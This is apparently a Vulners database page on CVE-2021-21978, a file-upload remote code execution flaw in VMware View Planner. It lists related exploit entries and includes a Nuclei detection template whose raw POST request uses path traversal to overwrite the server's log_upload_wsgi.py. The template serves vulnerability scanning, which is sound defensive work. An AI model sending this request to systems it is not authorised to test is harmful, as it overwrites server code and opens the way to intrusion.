| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| Exploit for Improper Input Validation in Vmware View_Planner | 5 Mar 202104:33 | – | githubexploit | |
| Exploit for Improper Input Validation in Vmware View_Planner | 5 Mar 202103:58 | – | githubexploit | |
| Exploit for Improper Input Validation in Vmware View_Planner | 5 Mar 202108:15 | – | githubexploit | |
| Exploit for Server-Side Request Forgery in Microsoft | 8 Mar 202109:12 | – | githubexploit | |
| Exploit for Server-Side Request Forgery in Microsoft | 9 Mar 202116:54 | – | githubexploit | |
| VMware View Planner 4.6 Remote Code Execution Exploit | 19 Mar 202100:00 | – | zdt | |
| CVE-2021-21978 | 3 Mar 202100:00 | – | attackerkb | |
| The vulnerability in the web application of the logupload software for load testing infrastructure in Virtual PC environments via VMware View Planner allows a perpetrator to execute arbitrary code. | 30 Mar 202100:00 | – | bdu_fstec | |
| CVE-2021-21978 | 3 Mar 202120:45 | – | circl | |
| VMware View Planner 代码问题漏洞 | 3 Mar 202100:00 | – | cnnvd |
id: CVE-2021-21978
info:
name: VMware View Planner <4.6 SP1- Remote Code Execution
author: dwisiswant0
severity: critical
description: |
VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
file leading to remote code execution within the logupload container.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability.
reference:
- https://twitter.com/osama_hroot/status/1367258907601698816
- https://nvd.nist.gov/vuln/detail/CVE-2021-21978
- https://www.vmware.com/security/advisories/VMSA-2021-0003.html
- http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html
- https://github.com/HimmelAward/Goby_POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-21978
cwe-id: CWE-20
epss-score: 0.99005
epss-percentile: 0.99925
cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: vmware
product: view_planner
tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive,vkev,vuln
http:
- raw:
- |
POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept: text/html
Referer: {{BaseURL}}
Connection: close
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="logfile"; filename=""
Content-Type: text/plain
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body) == 28"
- type: word
part: body
words:
- "File uploaded successfully."
- type: status
status:
- 200
# digest: 4b0a00483046022100b2cb84f130413f281ac4836ac72dc9124c44a27cb0a7b59b87a3ed7ad37eeaf9022100b8ed0589f1c07a598ad2905d64283189cfd028f9f668c2132a89ee66699b2ad2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation